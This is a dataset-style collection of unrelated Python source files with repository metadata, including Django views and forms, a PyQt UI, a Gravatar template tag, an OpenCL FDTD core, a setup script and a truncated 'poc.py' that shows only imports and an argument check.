dm *= 1.1
outfile.close()
|
UTF-8
|
Python
| false | false | 2,014 |
12,360,915,923,145 |
95f7809660a0e050b52b01c36aa8a389a70374ef
|
c00ab2b06bb48fee136b3bfc49cc28223e77288d
|
/kickstart/web/views.py
|
66672918dc2ca072a2d8d1633364198ea9b9264a
|
[] |
no_license
|
acmeguy/django-kickstart
|
https://github.com/acmeguy/django-kickstart
|
2e6d024142ce599510bee2436de9ab4c4f613838
|
652379860d7f51fbd673d70a44a20730b19b183e
|
refs/heads/master
| 2020-05-24T13:36:56.639666 | 2013-01-21T18:51:25 | 2013-01-21T18:51:25 | 5,890,610 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# some_app/views.py
from django.views.generic import TemplateView, FormView
from kickstart.web.forms import ContactUsForm, FanOutForm
from django.views.decorators.cache import cache_page
import redis
import json
class Home(TemplateView):
template_name = "web/pages/about_us.html"
def get_template_names(self):
return super(Home, self).get_template_names()
def get_context_data(self, **kwargs):
return super(Home, self).get_context_data(**kwargs)
class FanOut(FormView):
template_name = "web/pages/fan_out.html"
form_class = FanOutForm
success_url = '/send_message/'
def form_valid(self, form):
redis_subscribe = redis.StrictRedis()
message = form.cleaned_data['message']
redis_subscribe.publish('socketio_news',json.dumps({'title':message}))
return super(FanOut, self).form_valid(form)
class ContactUs(FormView):
form_class = ContactUsForm
template_name = "web/pages/contact_us.html"
success_url = '/'
#success_url = '/thanks/'
def form_valid(self, form):
form.send_email()
return super(ContactUs, self).form_valid(form)
|
UTF-8
|
Python
| false | false | 2,013 |
4,217,657,902,223 |
554f7c6990721cca51ea31ba3a797e151a985e31
|
c457113f6b93f1293273644cb55ac946037512c5
|
/mainWindow.py
|
4f8d7b3d68cd9a299f5c7fa7dfd7b49ae372f8e0
|
[] |
no_license
|
melloGuilherme/VideoGame_ontology
|
https://github.com/melloGuilherme/VideoGame_ontology
|
ba3ebed483ade80519d50ac1b32ee3cd36f48719
|
72fa73b699d56f75cc79e05b8d60119cf2f71915
|
refs/heads/master
| 2021-01-10T19:41:49.206954 | 2013-06-26T02:38:54 | 2013-06-26T02:38:54 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainWindow.ui'
#
# Created: Wed May 22 11:30:11 2013
# by: PyQt4 UI code generator 4.10
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(391, 512)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.label_5 = QtGui.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(80, 20, 231, 21))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Gill Sans Ultra Bold"))
font.setPointSize(14)
font.setBold(False)
font.setWeight(50)
self.label_5.setFont(font)
self.label_5.setObjectName(_fromUtf8("label_5"))
self.gridLayoutWidget = QtGui.QWidget(self.centralwidget)
self.gridLayoutWidget.setGeometry(QtCore.QRect(10, 50, 371, 131))
self.gridLayoutWidget.setObjectName(_fromUtf8("gridLayoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.comboBox = QtGui.QComboBox(self.gridLayoutWidget)
self.comboBox.setObjectName(_fromUtf8("comboBox"))
self.gridLayout.addWidget(self.comboBox, 3, 1, 1, 1)
self.label = QtGui.QLabel(self.gridLayoutWidget)
self.label.setObjectName(_fromUtf8("label"))
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.label_3 = QtGui.QLabel(self.gridLayoutWidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1)
self.label_4 = QtGui.QLabel(self.gridLayoutWidget)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1)
self.lineEdit = QtGui.QLineEdit(self.gridLayoutWidget)
self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
self.gridLayout.addWidget(self.lineEdit, 0, 1, 1, 1)
self.comboBox_3 = QtGui.QComboBox(self.gridLayoutWidget)
self.comboBox_3.setEditable(False)
self.comboBox_3.setObjectName(_fromUtf8("comboBox_3"))
self.gridLayout.addWidget(self.comboBox_3, 1, 1, 1, 1)
self.comboBox_2 = QtGui.QComboBox(self.gridLayoutWidget)
self.comboBox_2.setObjectName(_fromUtf8("comboBox_2"))
self.gridLayout.addWidget(self.comboBox_2, 2, 1, 1, 1)
self.label_2 = QtGui.QLabel(self.gridLayoutWidget)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
spacerItem = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem)
self.pushButton = QtGui.QPushButton(self.gridLayoutWidget)
self.pushButton.setObjectName(_fromUtf8("pushButton"))
self.horizontalLayout.addWidget(self.pushButton)
self.gridLayout.addLayout(self.horizontalLayout, 4, 1, 1, 1)
self.tableView = QtGui.QTableView(self.centralwidget)
self.tableView.setGeometry(QtCore.QRect(10, 210, 371, 261))
self.tableView.setObjectName(_fromUtf8("tableView"))
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 391, 21))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuMenu = QtGui.QMenu(self.menubar)
self.menuMenu.setObjectName(_fromUtf8("menuMenu"))
self.menuInserir = QtGui.QMenu(self.menubar)
self.menuInserir.setObjectName(_fromUtf8("menuInserir"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionSobre = QtGui.QAction(MainWindow)
self.actionSobre.setObjectName(_fromUtf8("actionSobre"))
self.actionSair = QtGui.QAction(MainWindow)
self.actionSair.setObjectName(_fromUtf8("actionSair"))
self.menuMenu.addAction(self.actionSobre)
self.menuMenu.addAction(self.actionSair)
self.menubar.addAction(self.menuMenu.menuAction())
self.menubar.addAction(self.menuInserir.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
self.label_5.setText(_translate("MainWindow", "Procurar por Jogos", None))
self.label.setText(_translate("MainWindow", "Nome", None))
self.label_3.setText(_translate("MainWindow", "Mídia", None))
self.label_4.setText(_translate("MainWindow", "Console", None))
self.label_2.setText(_translate("MainWindow", "Fabricante", None))
self.pushButton.setText(_translate("MainWindow", "Procurar", None))
self.menuMenu.setTitle(_translate("MainWindow", "Menu", None))
self.menuInserir.setTitle(_translate("MainWindow", "Inserir", None))
self.actionSobre.setText(_translate("MainWindow", "Sobre", None))
self.actionSair.setText(_translate("MainWindow", "Sair", None))
|
UTF-8
|
Python
| false | false | 2,013 |
2,989,297,240,564 |
50e5e0b57776ca042190de845207e090b17f6b32
|
7972acfe9a0fda519d65680bcb9db8c626e11f70
|
/yo/http_client/http_client.py
|
2771f4b83d49d1fb000679f248218240eb3e4a52
|
[] |
permissive
|
mcos/yo-py
|
https://github.com/mcos/yo-py
|
df50902cf5ae0bc337f7c7b86bd133936e388e2d
|
7fb4e8907c6cc8291bee5c6210836f7a32999b79
|
refs/heads/master
| 2022-07-04T05:20:35.194700 | 2014-07-11T03:54:26 | 2014-07-11T03:54:26 | 21,719,557 | 2 | 0 |
BSD-3-Clause
| false | 2022-06-09T23:52:36 | 2014-07-11T03:04:51 | 2018-10-11T18:36:48 | 2022-06-09T23:52:35 | 8 | 4 | 1 | 4 |
Python
| false | false |
import requests
class HttpClient(object):
def __init__(self, url):
if not url:
raise Exception('A url is required')
self.url = url
def get(self, params):
return requests.get(self.url, params=params)
def post(self, data):
return requests.post(self.url, data=data)
|
UTF-8
|
Python
| false | false | 2,014 |
1,090,921,696,915 |
4042158253f352bd5dd494003af8e1b44bda0a25
|
f3df380bc51600d0e9c7046125efeaf2d1a29735
|
/RegApp/forms.py
|
a0ef2c03c4e267c8b020b9afbd79bd2b3df5a7c7
|
[] |
no_license
|
Cirmiir/RegDog
|
https://github.com/Cirmiir/RegDog
|
531c620ec9305f9aadeed024e89569ddaf3d92c0
|
d90d540200986d28ecf6575156a63d01bdaa1af3
|
refs/heads/master
| 2020-02-27T10:55:11.821738 | 2014-12-13T13:56:14 | 2014-12-13T13:56:14 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from django.db import models
from django import forms
from RegApp.models import Event, Member, Discipline, Dog, Protocol
class UserForm(forms.ModelForm):
password = forms.CharField(widget=forms.PasswordInput())
class Meta:
model = User
fields = ('username', 'email', 'password')
class EventForm(forms.ModelForm):
name = forms.CharField(widget=forms.TextInput(), label=u"Название")
date = forms.CharField(widget=forms.TextInput(), label=u"Дата")
class Meta:
model = Event
fields = ('name', 'date')
class MemberForm(forms.ModelForm):
firstName = forms.CharField(widget=forms.TextInput(), label=u"Имя")
middleName = forms.CharField(widget=forms.TextInput(), label=u"Отчество")
lastName = forms.CharField(widget=forms.TextInput(), label=u"Фамилия")
class Meta:
model = Member
fields = ('firstName', 'middleName', 'lastName')
exclude = ('user',)
class DogForm(forms.ModelForm):
nickname = forms.CharField(widget=forms.TextInput(), label=u"Кличка")
pid = forms.CharField(widget=forms.TextInput(), label=u"Пид")
fci = forms.CharField(widget=forms.TextInput(), label=u"ФКИ")
sex = forms.CharField(widget=forms.TextInput(), label=u"Пол")
birthday = forms.DateTimeField(widget=forms.DateTimeInput(), label=u"День рождения")
breed = forms.CharField(widget=forms.TextInput(), label=u"Порода")
class Meta:
model = Dog
fields = ('nickname', 'pid', 'fci', 'sex', 'birthday', 'breed')
exclude = ('user',)
class ProtocolForm(forms.ModelForm):
event = forms.ModelChoiceField(queryset=Event.objects.all(),
empty_label="Выберите Соревнование", label=u"Соревнования")
member = forms.ModelChoiceField(queryset=Member.objects.all(),
empty_label="Выберите участника", label=u"Участник")
class Meta:
model = Protocol
fields = ('member', 'event', 'discipline')
def __init__(self, *args, **kwargs):
super(ProtocolForm, self).__init__(*args, **kwargs)
self.fields['discipline'] = forms.ModelChoiceField(queryset=Discipline.objects.all(),
empty_label="Choise Discipline", label=u"Дисциплина")
|
UTF-8
|
Python
| false | false | 2,014 |
17,609,365,913,926 |
6209bfb608daf273d71ec17382e9274e6b0522d4
|
78477cc32db8a288eca370b47a284feff1dec14d
|
/setup.py_template
|
0d4d7708bad893b6cb96ec52d995bcd3c173c76b
|
[
"LicenseRef-scancode-unknown-license-reference",
"Python-2.0",
"CC0-1.0",
"CC-PDDC",
"LicenseRef-scancode-public-domain"
] |
non_permissive
|
Akm0d/python-pdcurses
|
https://github.com/Akm0d/python-pdcurses
|
b3ecc39b4b754a6a7d32f01e036458e5fdeb90f9
|
a868ea7bd4cb6d13fde7eededa60f42fcb44ed51
|
refs/heads/master
| 2021-01-04T12:59:37.973344 | 2011-02-07T01:52:00 | 2011-02-07T01:52:00 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
"""
python-pdcursesPDCURSES_FLAV setup module.
"""
import distutils.version
from distutils.core import setup, Extension
import os, sys
extra_link = []
extra_comp = []
extra_libs = []
def monkey_cmp (self, other):
"""
Monkey patch to resolve issue with 3.0 distutils.
"""
if isinstance(other, str):
other = distutils.version.LooseVersion(other)
if self.version == other.version:
return 0
if self.version < other.version:
return -1
if self.version > other.version:
return 1
if sys.hexversion <= 0x30001f0 and sys.hexversion >= 0x30000f0:
distutils.version.LooseVersion._cmp = monkey_cmp
def main ():
setup (
name = "pdcursesPDCURSES_FLAV",
version = "0.3.4",
description = "PDCurses drop-in replacement for _curses.",
author = "Jon McManus, PDCurses",
author_email = "[email protected]",
url = "http://www.github.com/jmcb/python-pdcurses",
long_description = """""",
classifiers = [
'Development Status :: 5 - Production/Stable', # PDCurses is a stable replacement for _curses.
'Environment :: Console',
'Environment :: Console :: Curses',
'Intended Audience :: Developers',
'License :: Public Domain',
'Operating System :: OS Independent',
'Programming Language :: C',
'Programming Language :: Python',
'Programming Language :: Python : 2.3',
'Programming Language :: Python : 2.4',
'Programming Language :: Python : 2.5',
'Programming Language :: Python : 2.6',
'Programming Language :: Python : 2.7',
'Topic :: Software Development :: Libraries :: Python Modules',
],
ext_modules = [Extension ('_curses',
sources = ['_curses_panel.c', '_cursesmodule.c'],
define_macros = [("WINDOW_HAS_FLAGS", None)],
extra_compile_args = ['-L./'] + extra_comp,
extra_link_args = ['-L./'] + extra_link,
libraries = ["pdcurses"] + extra_libs)],
data_files = [(".", ["pdcurses.dll"])],
include_dirs = ['./'],
)
if __name__=="__main__":
main()
|
UTF-8
|
Python
| false | false | 2,011 |
1,236,950,600,584 |
6cf58b8cea407b00234f41b15869137f663a1f43
|
79121e28227cf8ad6805b35243468de6b4a0dc93
|
/scoremanager/idetools/test/test_SegmentPackageManager_edit_init_py.py
|
0c696a1c21492b4cf0218abb196f8e5d63ec27d2
|
[
"GPL-3.0-or-later",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-3.0-only",
"LGPL-2.1-or-later",
"AGPL-3.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] |
non_permissive
|
jefftrevino/abjad
|
https://github.com/jefftrevino/abjad
|
ac783770630ec0806c9886bb35bb9f66bbb3c88c
|
3ea07a1339c26689de228b2690f76f0c41a25926
|
refs/heads/master
| 2021-01-22T01:38:30.480942 | 2014-09-17T23:35:18 | 2014-09-17T23:35:18 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- encoding: utf-8 -*-
from abjad import *
import scoremanager
ide = scoremanager.idetools.AbjadIDE(is_test=True)
def test_SegmentPackageManager_edit_init_py_01():
r'''Works when __init__.py doesn't exist.
'''
input_ = 'red~example~score g A ne q'
ide._run(input_=input_)
contents = ide._transcript.contents
string = 'Can not find' in contents
|
UTF-8
|
Python
| false | false | 2,014 |
11,948,599,061,254 |
dbcddc66ef17ee9e2960030429624a39d845adac
|
be138468218872ab0471185167c86f5061cbbd74
|
/trunk/SUAVE/Methods/Flight_Dynamics/__init__.py
|
99f08f0cf5a9b1bc5b0c3a6259a7e491cffdc7d1
|
[
"CC-BY-NC-SA-4.0",
"CC-BY-SA-3.0"
] |
non_permissive
|
thearn/SUAVE
|
https://github.com/thearn/SUAVE
|
e203816b73591c30e57b33a71ce3f44a46db1bac
|
bcca96e2e1dab5c482dc4447d8e6752406f80fbe
|
refs/heads/master
| 2021-01-18T06:52:35.804639 | 2014-08-20T22:14:52 | 2014-08-20T22:14:52 | 23,135,993 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import FlightDynamics
import equations_of_motion
import Static_Stability
import Dynamic_Stability
|
UTF-8
|
Python
| false | false | 2,014 |
15,934,328,689,601 |
fc1530f7d02b7169cf0a2dc55c5f208765dec71e
|
25900311cb220b977a21d26ab35db40e56a26828
|
/fcs/fcs/conftest.py
|
3da5adf98e25b374ad98edcdc1a4ba568e8fb106
|
[] |
no_license
|
agh-glk/fcs
|
https://github.com/agh-glk/fcs
|
d246493cfd762aa1474e0546773ce35711d95049
|
df8d816463b29d12d1e148bdaa68c7813cd9c6ef
|
refs/heads/master
| 2021-01-10T20:31:57.199070 | 2014-11-06T09:52:27 | 2014-11-06T09:52:27 | 14,281,330 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'fcs.settings'
|
UTF-8
|
Python
| false | false | 2,014 |
19,688,130,116,529 |
e5d2e3b3b40e30489f9a9c227f52f3dee5e9a9d8
|
bb89e2fb7b4cf7651c231ff15ed89b9ce9988cd0
|
/koieadmin/koie/migrations/0005_auto_20141104_1618.py
|
5c6a65e1f412daa328982b3375aebc21e0241428
|
[] |
no_license
|
sklirg/it1901
|
https://github.com/sklirg/it1901
|
b58142ea090530afb07370e8ff6bae54f575f1cc
|
73e6fce821bc152ef5fac53a67a127ac41dec844
|
refs/heads/master
| 2016-09-10T00:20:45.963347 | 2014-11-18T20:55:26 | 2014-11-18T20:55:26 | 23,614,453 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('koie', '0004_damage'),
]
operations = [
migrations.AlterModelOptions(
name='report',
options={'get_latest_by': 'reported_date'},
),
migrations.AddField(
model_name='report',
name='notification_date',
field=models.DateField(default=datetime.date(2014, 11, 4), auto_now=True),
preserve_default=False,
),
]
|
UTF-8
|
Python
| false | false | 2,014 |
3,358,664,442,469 |
fc32c3ab856e45dca58d6c45d3db0911bde9cbdf
|
fafb89a3552e4dbb47d134966462ef5f3f37f576
|
/KEMP/v0.6_ovelap_ok/fdtd3d/gpu/core_split2.py
|
c6f207343d62198baa2396a3751da81219adf0a7
|
[] |
no_license
|
EMinsight/fdtd_accelerate
|
https://github.com/EMinsight/fdtd_accelerate
|
78fa1546df5264550d12fba3cf964838b560711d
|
a566c60753932eeb646c4a3dea7ed25c7b059256
|
refs/heads/master
| 2021-12-14T03:26:52.070069 | 2012-07-25T08:25:21 | 2012-07-25T08:25:21 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import numpy as np
import pyopencl as cl
from kemp.fdtd3d.util import common, common_gpu
from fields import Fields
class CoreSplit2:
def __init__(self, fields):
"""
"""
common.check_type('fields', fields, Fields)
# local variables
context = fields.context
ns_pitch = fields.ns_pitch
pad = fields.pad
precision_float = fields.precision_float
dtype_str_list = fields.dtype_str_list
ce_on = fields.ce_on
ch_on = fields.ch_on
eh_bufs = fields.eh_bufs
if ce_on:
ce_bufs = fields.ce_bufs
if ch_on:
ch_bufs = fields.ch_bufs
ls = fields.ls
# program
str_pad = '' if pad==0 else '-%s' % pad
coeff_constant = {'single': '0.5f', 'double': '0.5'}[precision_float]
macros = ['ARGS_CE', 'CEX', 'CEY', 'CEZ', \
'ARGS_CH', 'CHX', 'CHY', 'CHZ', \
'DX', 'PAD', 'DTYPE', 'PRAGMA_fp64']
values = ['', coeff_constant, coeff_constant, coeff_constant, \
'', coeff_constant, coeff_constant, coeff_constant, \
str(ls), str_pad] + dtype_str_list
if ce_on:
values[:4] = [ \
', __global DTYPE *cex, __global DTYPE *cey, __global DTYPE *cez', \
'cex[idx]', 'cey[idx]', 'cez[idx]']
if ch_on:
values[4:8] = [ \
', __global DTYPE *chx, __global DTYPE *chy, __global DTYPE *chz', \
'chx[idx]', 'chy[idx]', 'chz[idx]']
ksrc = common.replace_template_code( \
open(common_gpu.src_path + 'core_split.cl').read(), macros, values)
program = cl.Program(context, ksrc).build()
# arguments
e_args = ns_pitch + eh_bufs
h_args = ns_pitch + eh_bufs
if ce_on:
e_args += ce_bufs
if ch_on:
h_args += ch_bufs
nx, ny, nz_pitch = ns_pitch
nyzp = ny * nz_pitch
e_args_dict = { \
'': [np.int32(0), np.int32(nx*nyzp)] + e_args, \
'pre': [np.int32(0), np.int32(nyzp)] + e_args, \
'post': [np.int32(nyzp), np.int32(nx*nyzp)] + e_args}
h_args_dict = { \
'': [np.int32(0), np.int32(nx*nyzp)] + h_args, \
'pre': [np.int32((nx-1)*nyzp), np.int32(nx*nyzp)] + h_args, \
'post': [np.int32(0), np.int32((nx-1)*nyzp)] + h_args}
gs = lambda n: int(n) if (n % fields.ls) == 0 else int(n - (n % fields.ls) + fields.ls)
gs_dict = { \
'': gs(nx*nyzp), \
'pre': gs(nyzp), \
'post': gs((nx-1)*nyzp)}
# global variables and functions
self.mainf = fields
self.program = program
self.e_args_dict = e_args_dict
self.h_args_dict = h_args_dict
self.gs_dict = gs_dict
# append to the update list
#self.priority_type = 'core'
#self.mainf.append_instance(self)
def update_e(self, part=''):
self.program.update_e(self.mainf.queue, (self.gs_dict[part],), (self.mainf.ls,), *self.e_args_dict[part])
def update_h(self, part=''):
self.program.update_h(self.mainf.queue, (self.gs_dict[part],), (self.mainf.ls,), *self.h_args_dict[part])
|
UTF-8
|
Python
| false | false | 2,012 |
7,052,336,325,616 |
1d326132e2f6cde259464420c51da53260b3ba57
|
750b3616b1f89869f69895dee79a46a0aa59caf0
|
/usr/lib/gen/seller.py
|
f3bcc3f855dbebbe860ac3ac44729b06d993132f
|
[] |
no_license
|
boris-r-v/ArmDsp-Generator
|
https://github.com/boris-r-v/ArmDsp-Generator
|
4f49a265c6a2bcbdfd3bd5f54dd605ea90683fda
|
5ecbc0854be2004c19b0288e0134fe0b96eb5a84
|
refs/heads/master
| 2019-08-01T21:03:19.476798 | 2011-06-21T11:41:50 | 2011-06-21T11:41:50 | 1,928,782 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python2
# -*- coding: utf-8 -*-
import string
import re
#Продавец ТУ и ТС
class TSandTUseller:
#максимальное число импульсов в группе
maxImpulses=8
isFirstCall=True
#круг
circle=0
#станция
station=0
#группа
group=1
#импульс
impulse=0
last=""
iniStr=""
isNewGroup = False
#конструктор (передается - max кол-во импульсов в группе и имя файла,
#в котором сохранены последние используемые имя группы и импульса)
def __init__(self, maxImpulses, last, lastValue="6:0", _isNewGroup = False):
self.maxImpulses = maxImpulses
self.last = last
self.isNewGroup = _isNewGroup
print "++++ Начало записи значения ТС/ТУ"
try:
file=open(last,'r')
lastValue=file.read()
file.close()
except IOError, (errno, streror):
file=open(last,'w')
file.write(lastValue)
file.close()
lastValues=re.split(":",lastValue)
self.group=string.atoi(lastValues[0])
self.impulse=string.atoi(lastValues[1])
print "Последняя записываемая группа - "+str(self.group)+", импульс - "+str(self.impulse)
#купить сформированную строку ТУ/ТС (isNewGroup - начинать новую группу или нет)
def buy(self, name="", isNewGroup=False, startImp=1):
#if startImp!=1:
# self.impulse=startImp
if self.isFirstCall:
self.iniStr+="Группа"+str(self.group)+"\t{\t"
self.isFirstCall=False
if isNewGroup:
for i in range(self.impulse, self.maxImpulses+1):
self.iniStr+=str(i)+":\t"
if i==self.maxImpulses:
self.iniStr+="}"
self.impulse=self.maxImpulses
self.impulse+=1
if self.impulse > self.maxImpulses:
self.group+=1
self.impulse=startImp
self.iniStr+="}\nГруппа"+str(self.group)+"\t{\t"
self.iniStr+=str(self.impulse)+":"+str(name)+"\t"
return str(self.circle)+" "+str(self.station)+" "+str(self.group)+" "+str(self.impulse)
def endIni(self):
for i in range(self.impulse, self.maxImpulses+1):
self.iniStr+=str(i)+":\t"
if i==self.maxImpulses:
self.iniStr+="}"
#купить сформированный список кодов ТУ/ТС (isNewGroup - начинать новую группу или нет)
def buyList(self,isNewGroup=False):
strCodes=self.buy(isNewGroup)
codesArr=strCodes.split(" ")
codes={}
codes["circle"]=codesArr[0]
codes["station"]=codesArr[1]
codes["group"]=codesArr[2]
codes["impulse"]=codesArr[3]
return codes
def getIni(self):
return self.iniStr
def getFullTitle(self, i, tmp2):
tts=tmp2.split("title=\"")
tts2=tts[i+1].split("\"")
t=tts2[0]
t=re.sub("\s", "", t, 100)
return t
#деструктор (сохраняет последние значения группы и импульса)
def __del__(self):
print "Сохраняю последние значения группы и импульса: "+str(self.group)+":"+str(self.impulse)
f=open(self.last,'w')
f.write(str(self.group)+":"+str(self.impulse))
f.close()
|
UTF-8
|
Python
| false | false | 2,011 |
15,547,781,643,379 |
5ced267dc13cfa1f33b55741ad075d0a682203aa
|
c7c62c5de87228e3fe5ffe179bdf23cb336dcf96
|
/django_gravatar/templatetags/gravatar_tags.py
|
1280704d5237c594dcce0918781201bc849411ee
|
[
"MIT"
] |
permissive
|
chronossc/django-gravatar
|
https://github.com/chronossc/django-gravatar
|
a863fbb718c3849e96db96b1f186d845f18eb2bd
|
b179700dc333080e82dbeb76e99c8da9bf5fc4ce
|
refs/heads/master
| 2021-01-18T11:51:29.988469 | 2010-09-22T03:31:11 | 2010-09-22T03:31:11 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
import urllib
import hashlib
from django import template
from django.conf import settings
URL_RE = re.compile(r'^https?://([-\w\.]+)+(:\d+)?(/([\w/_\.]*(\?\S+)?)?)?',
re.IGNORECASE)
EMAIL_RE = re.compile(r'^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$',
re.IGNORECASE)
GRAVATAR_URL_PREFIX = 'http://www.gravatar.com/avatar/'
DEFAULT_PARAMS = \
{
# api_key: (gravatar_key, value),
'size': ('s', 80), # value is in [1,512]
'rating': ('r', 'g'), # 'pg', 'r', or 'x'
'default': ('d', ''), # 'identicon', 'monsterid', 'wavatar', '404', or escaped URI
}
register = template.Library()
def _build_gravatar_url(email, params):
"""Generate a Gravatar URL.
"""
# step 1: get a hex hash of the email address
email = email.strip().lower().encode('utf-8')
if not EMAIL_RE.match(email):
return ''
email_hash = hashlib.md5(email).hexdigest()
# step 2a: build a canonized parameters dictionary
if not type(params).__name__ == 'dict':
params = params.__dict__
actual_params = {}
default_keys = DEFAULT_PARAMS.keys()
for key, value in params.items():
if key in default_keys:
k, default_value = DEFAULT_PARAMS[key]
# skip parameters whose values are defaults,
# assume these values are mirroring Gravatar's defaults
if value != default_value:
actual_params[k] = value
# step 2b: validate the canonized parameters dictionary
# silently drop parameter when the value is not valid
for key, value in actual_params.items():
if key == 's':
if value < 1 or value > 512:
del actual_params[key]
elif key == 'r':
if value.lower() not in ('g', 'pg', 'r', 'x'):
del actual_params[key]
# except when the parameter key is 'd': replace with 'identicon'
elif key == 'd':
if value.lower() not in ('identicon', 'monsterid', 'wavatar', '404'):
if not URL_RE.match(value): # if not a valid URI
del actual_params[key]
else: # valid URI, encode it
actual_params[key] = value # urlencode will encode it later
# step 3: encode params
params_encode = urllib.urlencode(actual_params)
# step 4: form the gravatar url
gravatar_url = GRAVATAR_URL_PREFIX + email_hash
if params_encode:
gravatar_url += '?' + params_encode
return gravatar_url
class GravatarURLNode(template.Node):
def __init__(self, email, params):
self.email = email
self.params = params
def render(self, context):
try:
if self.params:
params = template.Variable(self.params).resolve(context)
else:
params = {}
# try matching an address string literal
email_literal = self.email.strip().lower()
if EMAIL_RE.match(email_literal):
email = email_literal
# treat as a variable
else:
email = template.Variable(self.email).resolve(context)
except template.VariableDoesNotExist:
return ''
# now, we generate the gravatar url
return _build_gravatar_url(email, params)
@register.tag(name="gravatar_url")
def get_gravatar_url(parser, token):
"""For template tag: {% gravatar_url <email> <params> %}
Where <params> is an object or a dictionary (variable), and <email>
is a string object (variable) or a string (literal).
"""
try:
tag_name, email, params = token.split_contents()
except ValueError:
try:
tag_name, email = token.split_contents()
params = None
except ValueError:
raise template.TemplateSyntaxError('%r tag requires one or two arguments.' %
token.contents.split()[0])
# if email is quoted, parse as a literal string
if email[0] in ('"', "'") or email[-1] in ('"', "'"):
if email[0] == email[-1]:
email = email[1:-1]
else:
raise template.TemplateSyntaxError(
"%r tag's first argument is in unbalanced quotes." % tag_name)
return GravatarURLNode(email, params)
|
UTF-8
|
Python
| false | false | 2,010 |
11,768,210,400,658 |
b1c2b67e39581cc4a5a2019e15e65a88215f5edd
|
dfe52c8c5ab5d28f3603a526459799fca1e982eb
|
/valid/testing_modules/testcase_55_yum_group_install.py
|
0fe5d42dfc366c7b5ba32a95be3439b17795b882
|
[
"GPL-3.0-only"
] |
non_permissive
|
bcrochet/valid
|
https://github.com/bcrochet/valid
|
aa2f0d366004f8fd2c00e464da5ea318badba5bf
|
7b9de36c7c686b6b6f414468d7324e3f7ac3d6af
|
refs/heads/master
| 2021-01-15T19:50:36.617610 | 2013-05-09T16:06:58 | 2013-05-09T16:06:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from valid.valid_testcase import *
class testcase_55_yum_group_install(ValidTestcase):
"""
Try to install 'Development tools' group with yum
"""
stages = ['stage1']
tags = ['default']
def test(self, connection, params):
self.get_return_value(connection, 'yum -y groupinstall \'Development tools\'', 600)
return self.log
|
UTF-8
|
Python
| false | false | 2,013 |
3,058,016,737,886 |
d4c6cd49f965202f51d26d2dca02995bb6a4ccb5
|
48471487bd5ddd26cc4647a378cfab8e727f1c40
|
/std/poc.py
|
b5fe3dad9c2b697fc2e840b0eced751109b604ca
|
[] |
no_license
|
Trietptm-on-Security/hitbkul
|
https://github.com/Trietptm-on-Security/hitbkul
|
4f9fe864b9c2c36200de86800dd1f0b21b7dd6ad
|
0dc095e5e92ce58646676d4a011bdf4bfd75d324
|
refs/heads/master
| 2017-10-18T06:54:47.004616 | 2012-10-10T06:45:39 | 2012-10-10T06:45:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import socket, sys, struct
if len(sys.argv) != 3:
